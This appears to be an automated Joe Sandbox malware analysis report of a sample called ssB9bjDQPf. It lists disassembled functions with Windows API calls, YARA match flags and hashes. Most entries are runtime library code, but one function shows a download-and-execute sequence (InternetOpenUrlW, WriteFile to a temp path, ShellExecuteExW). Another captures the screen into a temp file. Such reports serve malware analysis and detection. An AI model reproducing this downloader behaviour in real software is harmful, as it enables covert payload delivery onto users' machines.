                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                    • Instruction ID: e9376ae63a34bc09890512311abc0d6d9faab7c813eb248513f8b3118aa40b06
                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                    • Instruction Fuzzy Hash: 13616C7264270976FF38692C8890BBEBBB5BF81B18F040919E842DF2C1D719E942C75D
                                                    Function 004277F6 Relevance: .2, Instructions: 232COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                    Function 02517A5D Relevance: .2, Instructions: 232COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction ID: d96b53fa0f0ab57548cdaa15937902aa17178b0fe16c2c33cdf16fdd4f441fb6
                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction Fuzzy Hash: 108164722090E349FB69463E847453EFFE16A452A970A0B9ED4F2CB1C1FF24C664D624
                                                    Function 00428560 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                    Function 025187C7 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 4f02105b888c5ffb23e6549d66153fc5ee36f3aa5bf321a4af7195cc47f749ab
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 8511C87720004267F6788A2ED4BC6BAEB96FAC523873D5A7AD0414B658D322E145D608
                                                    Function 00AF9893 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: dadaf67bea7a502976efaa149c4368e0914a28b4629b40c124e114dcc1c123d5
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: 13115A72340104AFD754DF95DCC1FB773EAEB89360B2980A9EA04CB312D675E841C7A0
                                                    Function 024F0D90 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: a1c71ae27c6bec535a0940fb186207137ad1d37a2fc915d52da6caf67d1247ae
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: 0D01F273A116008FDF61CF20C904BAB33E9FBC6206F0550A6DA0A9738AE370A8418B80
                                                    Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                    • GetClientRect.USER32(?,?), ref: 0040214A
                                                    • GetDC.USER32(?), ref: 00402151
                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                    • _wcslen.LIBCMT ref: 0040227F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                    • String ID: Tahoma
                                                    • API String ID: 3832963559-3580928618
                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                    Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                    • GetDC.USER32(00000000), ref: 00402619
                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                    • DeleteDC.GDI32(00000000), ref: 00402738
                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                    • DestroyWindow.USER32(?), ref: 00402754
                                                    • SetCapture.USER32(?), ref: 004027A1
                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                    • String ID: gya
                                                    • API String ID: 2545303185-1989253062
                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                    Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                    Function 0251E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                    • Instruction ID: ea697259eda2c798d68d53481916d06b4f9b7bf13471f832719d2858ddd7bf87
                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                    • Instruction Fuzzy Hash: DBB1D07190031AAFEB11DF68C881BEEBBF9BF49304F14446DE895A7281D775A845CF28
                                                    Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                    • _free.LIBCMT ref: 0043A631
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043A653
                                                    • _free.LIBCMT ref: 0043A668
                                                    • _free.LIBCMT ref: 0043A673
                                                    • _free.LIBCMT ref: 0043A695
                                                    • _free.LIBCMT ref: 0043A6A8
                                                    • _free.LIBCMT ref: 0043A6B6
                                                    • _free.LIBCMT ref: 0043A6C1
                                                    • _free.LIBCMT ref: 0043A6F9
                                                    • _free.LIBCMT ref: 0043A700
                                                    • _free.LIBCMT ref: 0043A71D
                                                    • _free.LIBCMT ref: 0043A735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                    Function 0252A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 0252A8A3
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C0F
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C21
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C33
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C45
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C57
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C69
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C7B
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C8D
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C9F
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CB1
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CC3
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CD5
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CE7
                                                    • _free.LIBCMT ref: 0252A898
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A8BA
                                                    • _free.LIBCMT ref: 0252A8CF
                                                    • _free.LIBCMT ref: 0252A8DA
                                                    • _free.LIBCMT ref: 0252A8FC
                                                    • _free.LIBCMT ref: 0252A90F
                                                    • _free.LIBCMT ref: 0252A91D
                                                    • _free.LIBCMT ref: 0252A928
                                                    • _free.LIBCMT ref: 0252A960
                                                    • _free.LIBCMT ref: 0252A967
                                                    • _free.LIBCMT ref: 0252A984
                                                    • _free.LIBCMT ref: 0252A99C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction ID: 4b81f423d76342341a378a0188d79d4e1e0ef95540ea8364cef7032030e994fd
                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction Fuzzy Hash: DA31A031600326AFEB20AB39D840B56BBEABF46360F114459E449D76D0DF74F859CB5C
                                                    Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                    Function 024F2C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024F2C7E
                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024F2C94
                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 024F2CB0
                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024F2CC6
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024F2CFF
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024F2D3B
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024F2D58
                                                    • ShellExecuteExW.SHELL32(?), ref: 024F2DCF
                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 024F2DE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                    • String ID: <
                                                    • API String ID: 838076374-4251816714
                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                    • Instruction ID: 942126ea1584620f2a01b58bf5110de12b74cb24d6b70bebb39755c15274f0d5
                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                    • Instruction Fuzzy Hash: 89414E7190021DAEEB60DF649C85FEAB7BCFB45745F0080E6A649A2150DFB09E858FA4
                                                    Function 0250EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0250F228,00000004,02507D87,00000004,02508069), ref: 0250EEF9
                                                    • GetLastError.KERNEL32(?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000,?), ref: 0250EF05
                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000), ref: 0250EF15
                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0250EF2B
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF41
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF58
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF6F
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF86
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                    • String ID: advapi32.dll
                                                    • API String ID: 2340687224-4050573280
                                                    • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                    • Instruction ID: e464381b8cf5a5ff9ab08dba5fff0d230a9b0c3b51c673e29735a0a56c4ead43
                                                    • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                    • Instruction Fuzzy Hash: 25217CB1904611BFE7106FB4DC4DA5ABFA8FF05B16F104A2AF555E3640CBBC94418FA8
                                                    Function 0250EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0250F228,00000004,02507D87,00000004,02508069), ref: 0250EEF9
                                                    • GetLastError.KERNEL32(?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000,?), ref: 0250EF05
                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000), ref: 0250EF15
                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0250EF2B
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF41
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF58
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF6F
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF86
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                    • String ID: advapi32.dll
                                                    • API String ID: 2340687224-4050573280
                                                    • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                    • Instruction ID: 0ffe6509c9d5117e3f1dd053f7e29e636573a801dd3499810abeae8b8d8532c5
                                                    • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                    • Instruction Fuzzy Hash: A4217CB1904711BBE7106FA4DC4DA5ABFACFB05B16F104A2AF555E3640CBBC94418BA8
                                                    Function 025024A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0250670B), ref: 025024B6
                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025024C4
                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025024D2
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0250670B), ref: 02502500
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02502507
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 02502522
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 0250252E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502544
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID: kernel32.dll
                                                    • API String ID: 4179531150-1793498882
                                                    • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                    • Instruction ID: 92ce81104e941873d05103bcd5e084f329e3fcaabc1241d11b32117295666725
                                                    • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                    • Instruction Fuzzy Hash: EA1182759003117FE7117B75ACDDA6B7BACBF46B12B20052ABC01E61D1EF78D9008A6D
                                                    Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                      • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                    • String ID: pContext$switchState
                                                    • API String ID: 3151764488-2660820399
